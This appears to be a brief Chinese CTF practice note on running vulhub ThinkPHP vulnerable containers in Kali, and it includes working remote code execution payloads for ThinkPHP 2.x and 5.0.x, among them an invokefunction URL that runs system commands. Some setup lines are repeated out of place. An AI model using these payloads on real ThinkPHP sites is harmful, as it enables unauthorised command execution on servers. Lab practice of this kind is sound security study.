环境搭建
我是在kali里面搭建的
参考
首先,看上面的搭建环境,进入vulhub/thinkphp,我们依次进行尝试。
在比赛中,我们的目的是执行命令,拿到flag。
现在,因为我的比赛只考命令执行,所以只需要命令可以正常执行就行,其他版本的sql注入漏洞、文件包含漏洞什么的就算了。
2-rce
这个是thinkphp2点多的版本,含有远程命令执行
cd ~/vulhub/thinkphp/5.0.23-rce
vim docker-compose.yml
?s=/index/index/name/${@phpinfo()}
5-rce(5.0.22\5.0.19)
http://192.168.1.242:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
5.0.23-rce(建议先看这个)
这个是thinkphp5.0.23,很典型的rce漏洞
咱不知道原理,直接用就行。想看原理,就在readme里,自己看吧。
修改这个文件,可以修改端口
cd ~/vulhub/thinkphp/5.0.23-rce
vim docker-compose.yml
把8080改成了9999,其他不变
这样就成功了